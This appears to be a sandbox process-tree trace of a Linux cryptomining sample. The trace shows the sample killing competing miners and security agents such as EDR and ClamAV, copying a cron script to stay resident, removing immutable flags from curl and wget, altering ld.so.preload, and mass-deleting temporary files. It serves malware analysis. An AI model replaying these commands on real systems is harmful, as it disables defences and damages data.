- /usr/bin/pkill
  pkill -f minerd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1852
- /usr/bin/pkill
  pkill -9 log-rotate
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1853
- /usr/bin/pkill
  pkill -9 warmun
  2⤵
  PID:1854
- /usr/bin/pkill
  pkill -9 kinettd
  2⤵
  PID:1855
- /usr/bin/find
  find /root -maxdepth 2 -name "*kill*"
  2⤵
  PID:1856
- /usr/bin/chattr
  chattr -aui /etc/cron.daily/xbash
  2⤵
  PID:1857
- /usr/bin/chattr
  chattr -aui /etc/cron.hourly/xbash
  2⤵
  PID:1858
- /bin/grep
  grep top.sh
  2⤵
  PID:1861
- /bin/grep
  grep -v grep
  2⤵
  PID:1860
- /bin/ps
  ps cax
  2⤵
  PID:1859
- /bin/grep
  grep ds_agent
  2⤵
  PID:1864
- /bin/grep
  grep -v grep
  2⤵
  PID:1863
- /bin/ps
  ps cax
  2⤵
  - Reads runtime system information
  PID:1862
- /bin/grep
  grep vm-agent
  2⤵
  PID:1867
- /bin/grep
  grep -v grep
  2⤵
  PID:1866
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1865
- /bin/grep
  grep mysqll
  2⤵
  PID:1870
- /bin/grep
  grep -v grep
  2⤵
  PID:1869
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:1868
- /bin/grep
  grep linux_client
  2⤵
  PID:1873
- /bin/grep
  grep -v grep
  2⤵
  PID:1872
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1871
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1878
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1879
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1879
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1879
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1879
- - /sbin/kill
    kill -9
    3⤵
    PID:1879
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1879
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1877
- /bin/grep
  grep -v grep
  2⤵
  PID:1876
- /bin/grep
  grep linux_client
  2⤵
  PID:1875
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:1874
- /bin/grep
  grep edr_agent
  2⤵
  PID:1882
- /bin/grep
  grep -v grep
  2⤵
  PID:1881
- /bin/ps
  ps cax
  2⤵
  - Reads runtime system information
  PID:1880
- /bin/grep
  grep edr_agent
  2⤵
  PID:1885
- /bin/grep
  grep -v grep
  2⤵
  PID:1884
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  PID:1883
- /bin/grep
  grep xs_agent
  2⤵
  PID:1888
- /bin/grep
  grep -v grep
  2⤵
  PID:1887
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  PID:1886
- /bin/grep
  grep cwpp_agent
  2⤵
  PID:1891
- /bin/grep
  grep -v grep
  2⤵
  PID:1890
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  PID:1889
- /bin/grep
  grep ds_agent
  2⤵
  PID:1894
- /bin/grep
  grep -v grep
  2⤵
  PID:1893
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1892
- /bin/grep
  grep guard_client
  2⤵
  PID:1897
- /bin/grep
  grep -v grep
  2⤵
  PID:1896
- /bin/ps
  ps cax
  2⤵
  PID:1895
- /bin/grep
  grep qaxsafe
  2⤵
  PID:1900
- /bin/grep
  grep -v grep
  2⤵
  PID:1899
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads runtime system information
  PID:1898
- /bin/grep
  grep clamav
  2⤵
  PID:1903
- /bin/grep
  grep -v grep
  2⤵
  PID:1902
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads runtime system information
  PID:1901
- /bin/grep
  grep 360safed
  2⤵
  PID:1906
- /bin/grep
  grep -v grep
  2⤵
  PID:1905
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1904
- /bin/grep
  grep eppagent
  2⤵
  PID:1909
- /bin/grep
  grep -v grep
  2⤵
  PID:1908
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  PID:1907
- /bin/rm
  rm -rf "/home/*/.local/share/Trash/*/**"
  2⤵
  PID:1910
- /bin/rm
  rm -rf "/root/.local/share/Trash/*/**"
  2⤵
  PID:1911
- /bin/rm
  rm -rf "/usr/share/man/??"
  2⤵
  PID:1912
- /bin/rm
  rm -rf "/usr/share/man/??_*"
  2⤵
  PID:1913
- /bin/rm
  rm -rf "/core.*"
  2⤵
  PID:1914
- /bin/rm
  rm -fr /root/install
  2⤵
  PID:1915
- /bin/rm
  rm -fr /boot/xmrig
  2⤵
  PID:1916
- /bin/rm
  rm -fr /root/xmrig
  2⤵
  PID:1917
- /bin/rm
  rm -fr /kinettd
  2⤵
  PID:1918
- /usr/bin/pkill
  pkill -9 abrtd
  2⤵
  - Reads CPU attributes
  PID:1919
- /bin/cp
  cp -f /etc/cron.daily/xbash /etc/cron.hourly/anacron
  2⤵
  PID:1920
- /bin/cp
  cp -f /etc/cron.daily/xbash /etc/cron.weekly/cron
  2⤵
  PID:1921
- /bin/chmod
  chmod 755 /etc/cron.hourly/anacron
  2⤵
  PID:1922
- /bin/chmod
  chmod 755 /etc/cron.weekly/cron
  2⤵
  PID:1923
- /usr/bin/arch
  arch
  2⤵
  PID:1924
- /usr/bin/arch
  arch
  2⤵
  PID:1925
- /usr/bin/arch
  arch
  2⤵
  PID:1926
- /usr/bin/basename
  basename /tmp/.adxintrin_b
  2⤵
  PID:1930
- /bin/cat
  cat /usr/adxintrin_b.pid
  2⤵
  PID:1931
- /bin/grep
  grep -q adxintrin_b
  2⤵
  PID:1933
- /bin/cat
  cat /proc/1578/status
  2⤵
  PID:1932
- /usr/bin/basename
  basename /tmp/.adxintrin_b
  2⤵
  PID:1934
- /bin/cat
  cat /dev/null
  2⤵
  PID:1935
- /bin/cat
  cat /dev/null
  2⤵
  PID:1936
- /usr/bin/arch
  arch
  2⤵
  PID:1946
- /bin/cat
  cat /dev/null
  2⤵
  PID:1947
- /bin/chmod
  chmod 755 /etc/ld.so.preload
  2⤵
  PID:1948
- /bin/grep
  grep -qP "^\\d+\$"
  2⤵
  PID:1949
- /usr/bin/find
  find /root -name "sed*" -type f -delete
  2⤵
  PID:1977
- /usr/bin/find
  find /etc/alternatives -name "sed*" -type f -delete
  2⤵
  PID:1978
- /usr/bin/find
  find /root/gcclib -name "sed*" -type f -delete
  2⤵
  PID:1979
- /bin/rm
  rm -rf /root/gcclib/ip1.txt
  2⤵
  PID:1980
- /bin/rm
  rm -rf /usr/spirit/ip1.txt
  2⤵
  PID:1981
- /usr/bin/chattr
  chattr -i -RV /usr/bin/curl
  2⤵
  - Attempts to change immutable files
  PID:1982
- /bin/chmod
  chmod 755 /usr/bin/curl
  2⤵
  PID:1983
- /usr/bin/chattr
  chattr -i -RV /usr/bin/wget
  2⤵
  - Attempts to change immutable files
  PID:1984
- /bin/chmod
  chmod 755 /usr/bin/wget
  2⤵
  PID:1985
- /bin/cat
  cat /usr/adxintrin_b.pid
  2⤵
  PID:1991
- /bin/grep
  grep -q adxintrin_b
  2⤵
  PID:1993
- /bin/cat
  cat /proc/1578/status
  2⤵
  PID:1992
- /bin/grep
  grep -a xfit /root/.bashrc
  2⤵
  PID:1994
- /bin/grep
  grep libgcc_a
  2⤵
  PID:2000
- /bin/grep
  grep -v ulimit
  2⤵
  PID:1999
- /bin/grep
  grep -v tar.gz
  2⤵
  PID:1998
- /bin/grep
  grep -v defunct
  2⤵
  PID:1997
- /bin/grep
  grep -v grep
  2⤵
  PID:1996
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:1995
- /bin/grep
  grep -q -- --tries
  2⤵
  PID:2002
- /usr/bin/wget
  wget -h
  2⤵
  PID:2001
- /usr/bin/find
  find /root -name "sed*" -type f -delete
  2⤵
  PID:2017
- /usr/bin/find
  find /etc/alternatives -name "sed*" -type f -delete
  2⤵
  PID:2018
- /usr/bin/find
  find /root/gcclib -name "sed*" -type f -delete
  2⤵
  PID:2019
- /usr/bin/find
  find /tmp/adxintrin_b /tmp/config-err-IZZ5VD /tmp/netplan_ligmn7fm /tmp/snap-private-tmp /tmp/ssh-IhHBg5F71mBO /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R -mtime +1 -exec rm "{}" ";"
  2⤵
  - Attempts to change immutable files
  PID:2020
- - /usr/local/sbin/rm
    rm /tmp/adxintrin_b
    3⤵
    PID:2021
- - /usr/local/bin/rm
    rm /tmp/adxintrin_b
    3⤵
    PID:2021
- - /usr/sbin/rm
    rm /tmp/adxintrin_b
    3⤵
    PID:2021
- - /usr/bin/rm
    rm /tmp/adxintrin_b
    3⤵
    PID:2021
- - /sbin/rm
    rm /tmp/adxintrin_b
    3⤵
    PID:2021
- - /bin/rm
    rm /tmp/adxintrin_b
    3⤵
    PID:2021
- - /usr/local/sbin/rm
    rm /tmp/config-err-IZZ5VD
    3⤵
    - Attempts to change immutable files
    PID:2022
- - /usr/local/bin/rm
    rm /tmp/config-err-IZZ5VD
    3⤵
    - Attempts to change immutable files
    PID:2022
- - /usr/sbin/rm
    rm /tmp/config-err-IZZ5VD
    3⤵
    - Attempts to change immutable files
    PID:2022
- - /usr/bin/rm
    rm /tmp/config-err-IZZ5VD
    3⤵
    - Attempts to change immutable files
    PID:2022
- - /sbin/rm
    rm /tmp/config-err-IZZ5VD
    3⤵
    - Attempts to change immutable files
    PID:2022
- - /bin/rm
    rm /tmp/config-err-IZZ5VD
    3⤵
    - Attempts to change immutable files
    PID:2022
- - /usr/local/sbin/rm
    rm /tmp/netplan_ligmn7fm
    3⤵
    PID:2023
- - /usr/local/bin/rm
    rm /tmp/netplan_ligmn7fm
    3⤵
    PID:2023
- - /usr/sbin/rm
    rm /tmp/netplan_ligmn7fm
    3⤵
    PID:2023
- - /usr/bin/rm
    rm /tmp/netplan_ligmn7fm
    3⤵
    PID:2023
- - /sbin/rm
    rm /tmp/netplan_ligmn7fm
    3⤵
    PID:2023
- - /bin/rm
    rm /tmp/netplan_ligmn7fm
    3⤵
    PID:2023
- - /usr/local/sbin/rm
    rm /tmp/snap-private-tmp
    3⤵
    PID:2024
- - /usr/local/bin/rm
    rm /tmp/snap-private-tmp
    3⤵
    PID:2024
- - /usr/sbin/rm
    rm /tmp/snap-private-tmp
    3⤵
    PID:2024
- - /usr/bin/rm
    rm /tmp/snap-private-tmp
    3⤵
    PID:2024
- - /sbin/rm
    rm /tmp/snap-private-tmp
    3⤵
    PID:2024
- - /bin/rm
    rm /tmp/snap-private-tmp
    3⤵
    PID:2024
- - /usr/local/sbin/rm
    rm /tmp/ssh-IhHBg5F71mBO
    3⤵
    - Attempts to change immutable files
    PID:2025
- - /usr/local/bin/rm
    rm /tmp/ssh-IhHBg5F71mBO
    3⤵
    - Attempts to change immutable files
    PID:2025
- - /usr/sbin/rm
    rm /tmp/ssh-IhHBg5F71mBO
    3⤵
    - Attempts to change immutable files
    PID:2025
- - /usr/bin/rm
    rm /tmp/ssh-IhHBg5F71mBO
    3⤵
    - Attempts to change immutable files
    PID:2025
- - /sbin/rm
    rm /tmp/ssh-IhHBg5F71mBO
    3⤵
    - Attempts to change immutable files
    PID:2025
- - /bin/rm
    rm /tmp/ssh-IhHBg5F71mBO
    3⤵
    - Attempts to change immutable files
    PID:2025
- - /usr/local/sbin/rm
    rm /tmp/ssh-IhHBg5F71mBO/agent.726
    3⤵
    - Attempts to change immutable files
    PID:2026
- - /usr/local/bin/rm
    rm /tmp/ssh-IhHBg5F71mBO/agent.726
    3⤵
    - Attempts to change immutable files
    PID:2026
- - /usr/sbin/rm
    rm /tmp/ssh-IhHBg5F71mBO/agent.726
    3⤵
    - Attempts to change immutable files
    PID:2026
- - /usr/bin/rm
    rm /tmp/ssh-IhHBg5F71mBO/agent.726
    3⤵
    - Attempts to change immutable files
    PID:2026
- - /sbin/rm
    rm /tmp/ssh-IhHBg5F71mBO/agent.726
    3⤵
    - Attempts to change immutable files
    PID:2026
- - /bin/rm
    rm /tmp/ssh-IhHBg5F71mBO/agent.726
    3⤵
    - Attempts to change immutable files
    PID:2026
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx
    3⤵
    PID:2027
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx
    3⤵
    PID:2027
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx
    3⤵
    PID:2027
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx
    3⤵
    PID:2027
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx
    3⤵
    PID:2027
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx
    3⤵
    PID:2027
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx/tmp
    3⤵
    PID:2028
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx/tmp
    3⤵
    PID:2028
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx/tmp
    3⤵
    PID:2028
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx/tmp
    3⤵
    PID:2028
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx/tmp
    3⤵
    PID:2028
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx/tmp
    3⤵
    PID:2028
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx
    3⤵
    - Attempts to change immutable files
    PID:2029
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx
    3⤵
    - Attempts to change immutable files
    PID:2029
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx
    3⤵
    - Attempts to change immutable files
    PID:2029
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx
    3⤵
    - Attempts to change immutable files
    PID:2029
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx
    3⤵
    - Attempts to change immutable files
    PID:2029
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx
    3⤵
    - Attempts to change immutable files
    PID:2029
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx/tmp
    3⤵
    - Attempts to change immutable files
    PID:2030
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx/tmp
    3⤵
    - Attempts to change immutable files
    PID:2030
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx/tmp
    3⤵
    - Attempts to change immutable files
    PID:2030
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx/tmp
    3⤵
    - Attempts to change immutable files
    PID:2030
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx/tmp
    3⤵
    - Attempts to change immutable files
    PID:2030
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx/tmp
    3⤵
    - Attempts to change immutable files
    PID:2030
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV
    3⤵
    PID:2031
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV
    3⤵
    PID:2031
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV
    3⤵
    PID:2031
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV
    3⤵
    PID:2031
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV
    3⤵
    PID:2031
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV
    3⤵
    PID:2031
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV/tmp
    3⤵
    PID:2032
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV/tmp
    3⤵
    PID:2032
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV/tmp
    3⤵
    PID:2032
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV/tmp
    3⤵
    PID:2032
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV/tmp
    3⤵
    PID:2032
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV/tmp
    3⤵
    PID:2032
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs
    3⤵
    PID:2033
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs
    3⤵
    PID:2033
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs
    3⤵
    PID:2033
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs
    3⤵
    PID:2033
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs
    3⤵
    PID:2033
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs
    3⤵
    PID:2033
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs/tmp
    3⤵
    PID:2034
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs/tmp
    3⤵
    PID:2034
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs/tmp
    3⤵
    PID:2034
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs/tmp
    3⤵
    PID:2034
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs/tmp
    3⤵
    PID:2034
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs/tmp
    3⤵
    PID:2034
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R
    3⤵
    PID:2035
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R
    3⤵
    PID:2035
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R
    3⤵
    PID:2035
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R
    3⤵
    PID:2035
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R
    3⤵
    PID:2035
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R
    3⤵
    PID:2035
- - /usr/local/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R/tmp
    3⤵
    PID:2036
- - /usr/local/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R/tmp
    3⤵
    PID:2036
- - /usr/sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R/tmp
    3⤵
    PID:2036
- - /usr/bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R/tmp
    3⤵
    PID:2036
- - /sbin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R/tmp
    3⤵
    PID:2036
- - /bin/rm
    rm /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R/tmp
    3⤵
    PID:2036
- /usr/bin/find
  find /tmp/netplan_ligmn7fm /tmp/snap-private-tmp /tmp/ssh-IhHBg5F71mBO /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-bolt.service-2etzPx /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-colord.service-iVn9Zx /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-fwupd.service-OupUjV /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-ModemManager.service-A0v2gs /tmp/systemd-private-354780f1ddcf4fbe80fb6de39775c111-systemd-resolved.service-wr681R -type d -empty -delete
  2⤵
  - Attempts to change immutable files
  PID:2037
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:2043
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:2044
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:2044
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:2044
- - /usr/bin/kill
    kill -9
    3⤵
    PID:2044
- - /sbin/kill
    kill -9
    3⤵
    PID:2044
- - /bin/kill
    kill -9
    3⤵
    PID:2044
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:2042
- /bin/grep
  grep -v defunct
  2⤵
  PID:2041
- /bin/grep
  grep -v grep
  2⤵
  PID:2040
- /bin/grep
  grep spend-secret-key
  2⤵
  PID:2039
- /bin/ps
  ps -eaf
  2⤵
  - Reads CPU attributes
  PID:2038
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:2050
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:2051
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:2051
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:2051
- - /usr/bin/kill
    kill -9
    3⤵
    PID:2051
- - /sbin/kill
    kill -9
    3⤵
    PID:2051
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:2051
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:2049
- /bin/grep
  grep -v defunct
  2⤵
  PID:2048
- /bin/grep
  grep -v grep
  2⤵
  PID:2047
- /bin/grep
  grep -- "\\-\\-algo"
  2⤵
  PID:2046
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:2045
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:2057
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:2058
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:2058
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:2058
- - /usr/bin/kill
    kill -9
    3⤵
    PID:2058
- - /sbin/kill
    kill -9
    3⤵
    PID:2058
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:2058
- /bin/grep
  grep -v defunct
  2⤵
  PID:2055
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:2056
- /bin/grep
  grep -v grep
  2⤵
  PID:2054
- /bin/grep
  grep -- "\\-\\-url"
  2⤵
  PID:2053
- /bin/ps
  ps -eaf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2052
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:2064
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:2065
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:2065
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:2065
- - /usr/bin/kill
    kill -9
    3⤵
    PID:2065
- - /sbin/kill
    kill -9
    3⤵
    PID:2065
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:2065
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:2063
- /bin/grep
  grep -v defunct
  2⤵
  PID:2062
- /bin/grep
  grep -v grep
  2⤵
  PID:2061
- /bin/grep
  grep -- "\\-\\-donate-level"
  2⤵
  PID:2060
- /bin/ps
  ps -eaf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2059
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:2071
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:2072
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:2072
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:2072
- - /usr/bin/kill
    kill -9
    3⤵
    PID:2072
- - /sbin/kill
    kill -9
    3⤵
    PID:2072
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:2072
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:2070
- /bin/grep
  grep -v defunct
  2⤵
  PID:2069
- /bin/grep
  grep -v grep
  2⤵
  PID:2068
- /bin/grep
  grep minerd
  2⤵
  PID:2067
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:2066
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:2078
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:2079
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:2079
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:2079
- - /usr/bin/kill
    kill -9
    3⤵
    PID:2079
- - /sbin/kill
    kill -9
    3⤵
    PID:2079
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:2079
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:2077
- /bin/grep
  grep -v defunct
  2⤵
  PID:2076
- /bin/grep
  grep -v grep
  2⤵
  PID:2075
- /bin/grep
  grep xmr
  2⤵
  PID:2074
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:2073
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:2085
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:2086
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:2086
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:2086
- - /usr/bin/kill
    kill -9
    3⤵
    PID:2086
- - /sbin/kill
    kill -9
    3⤵
    PID:2086
- - /bin/kill
    kill -9
    3⤵
    PID:2086
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:2084
- /bin/grep
  grep -v defunct
  2⤵
  PID:2083
- /bin/grep
  grep -v grep
  2⤵
  PID:2082
- /bin/grep
  grep cryptonight
  2⤵
  PID:2081
- /bin/ps
  ps -eaf
  2⤵
  PID:2080
- /usr/bin/pkill
  pkill -9 xmrig
  2⤵
  - Reads runtime system information
  PID:2087
- /usr/bin/pkill
  pkill -f xmrig
  2⤵
  - Reads runtime system information
  PID:2088
- /usr/bin/pkill
  pkill -f Loopback
  2⤵
  PID:2089
- /usr/bin/pkill
  pkill -f apaceha
  2⤵
  - Reads runtime system information
  PID:2090
- /usr/bin/pkill
  pkill -f cryptonight
  2⤵
  PID:2091
- /usr/bin/pkill
  pkill -f stratum
  2⤵
  PID:2092
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  PID:2093
- /usr/bin/pkill
  pkill -9 log-rotate
  2⤵
  - Reads CPU attributes
  PID:2094
- /usr/bin/pkill
  pkill -9 warmun
  2⤵
  - Reads runtime system information
  PID:2095
- /usr/bin/pkill
  pkill -9 kinettd
  2⤵
  PID:2096
- /usr/bin/find
  find /root -maxdepth 2 -name "*kill*"
  2⤵
  PID:2097
- /usr/bin/chattr
  chattr -aui /etc/cron.daily/xbash
  2⤵
  - Attempts to change immutable files
  PID:2098
- /usr/bin/chattr
  chattr -aui /etc/cron.hourly/xbash
  2⤵
  - Attempts to change immutable files
  PID:2099
- /bin/grep
  grep top.sh
  2⤵
  PID:2102
- /bin/grep
  grep -v grep
  2⤵
